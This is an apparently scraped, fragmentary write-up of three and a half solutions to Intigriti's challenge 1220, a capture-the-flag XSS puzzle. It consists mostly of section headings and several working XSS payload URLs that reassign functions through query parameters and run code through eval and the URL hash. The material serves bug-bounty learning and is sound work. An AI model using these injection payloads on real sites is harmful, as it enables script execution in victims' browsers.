3 and a half solutions for Intigriti’s challenge 1220

The rules

Let’s get started!

A leet calculation

Time to check the source code

An initial thought

So what, you can set a variable?

thisFunction=thatFunction
https://challenge-1220.intigriti.io/?num1=calc&operator=%3D&num2=alert

Approaching a solution

decodeURIComponent=alert

Try harder

Found here

Let’s just not refresh

https://challenge-1220.intigriti.io/#?num1=calc&operator=%3d&num2=alert
location.hash = "?num1=document.domain"
A moment of confusion
location.hash = "?&num1=document.domain"
*facepalm*

Eval to the rescue

That’s better

Solution #1

A moment of relief

Title

A beautiful moment

Solution #2 | No user-interaction

Even more beautiful!

Solution #3 | An unintended solution

https://challenge-1220.intigriti.io/?num1=calc&operator=%3d&num2=eval&#?num1=alert(document.domain)
calc=eval
https://challenge-1220.intigriti.io/#?num1=alert(document.domain)

Solution #3.5 | A different approach to getting XSS

location=searchQueryString

Bug Bounty Hunter

holme
